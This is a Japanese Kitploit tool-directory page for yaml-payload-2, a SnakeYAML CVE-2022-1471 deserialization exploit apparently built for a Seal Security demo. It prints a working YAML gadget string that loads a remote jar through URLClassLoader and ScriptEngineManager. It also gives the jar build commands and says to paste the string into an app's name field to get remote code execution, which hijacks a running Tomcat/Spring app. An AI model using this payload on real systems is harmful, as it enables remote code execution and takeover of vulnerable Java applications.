Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
yaml-payload-2 — SnakeYAML CVE-2022-1471 エクスプロイトペイロード(Seal Securityデモ用) | Kitploit
ツール/GitHubGitHub/seal-sec-demo-2/yaml-payload-2
脆弱性分析エクスプロイトウェブアプリケーション悪用レッドチーミングペイロード開発
GitHubseal-sec-demo-2/yaml-payload-2

yaml-payload-2

SnakeYAML CVE-2022-1471 エクスプロイトペイロード(Seal Securityデモ用)

リポジトリを見る
1ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

yaml-payload

CVE-2022-1471 向けの SnakeYAML デシリアライゼーション悪用ペイロードです。artsploit/yaml-payload を基に改変しています(元は mbechler/marshalsec に基づく)。

動作内容

SnakeYAML の安全でない Yaml.load() で読み込まれると、このペイロードは実行中のアプリケーションを乗っ取り、"You've Been PWNED" ページに置き換えます:

  1. Tomcat Valve を注入 — リフレクションを介して実行中の Spring Boot アプリに Tomcat Valve を注入し、既存のポート 8080 を乗っ取ります。同じ URL(ngrok トンネルを含む)が PWNED ページを配信するようになります
  2. ブラウザを自動リダイレクト — POST レスポンスが 302 リダイレクトを送信するため、手動で更新しなくてもブラウザは即座に PWNED ページを読み込みます
  3. ブラウザを自動的に開く — 正しい URL(利用可能な場合は ngrok 公開 URL、それ以外は localhost:8080)を開きます
  4. 悪用の証拠を出力 — コンソール/CI ログに出力します

Tomcat Valve の注入が利用できない場合(例: Spring 以外のアプリ)は、ポート 9999 でスタンドアロンの HTTP サーバーを起動し、ngrok が実行中であれば ngrok トンネルを自動的に作成するフォールバックに切り替わります。

これは macOS 上のローカルと CI/CD パイプライン(例: Ubuntu 上の GitHub Actions)の両方で動作します。

エクスプロイトチェーンの仕組み

SnakeYAML ペイロードは、Java SPI(Service Provider Interface)を介して ScriptEngineManager をトリガーします:

root@kitploit:~
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["https://raw.githubusercontent.com/seal-sean-org/yaml-payload/main/yaml-payload.jar"]]]]
  1. SnakeYAML はこのリポジトリの yaml-payload.jar を指す java.net.URL をインスタンス化します
  2. それを URLClassLoader でラップしてリモートクラスを読み込みます
  3. ScriptEngineManager が META-INF/services/javax.script.ScriptEngineFactory を介して AwesomeScriptEngineFactory を検出・読み込みます
  4. ファクトリのコンストラクタが実行中の Tomcat パイプラインに Valve を注入し、/ への後続のすべてのレスポンスを PWNED ページに置き換えます

ビルド

JDK 17+ が必要です:

root@kitploit:~
javac -d build src/artsploit/AwesomeScriptEngineFactory.java
cp -r src/META-INF build/
cd build && jar -cfv ../yaml-payload.jar . && cd ..

使用方法

maven-demo プロジェクトのエクスプロイトペイロードとして使用します。ペイロード文字列をアプリの名前フィールドに貼り付けて RCE をトリガーします。次のリクエストでアプリのページが PWNED ページに置き換えられます。完全なデモ手順については、そのリポジトリの README を参照してください。

ツールをダウンロード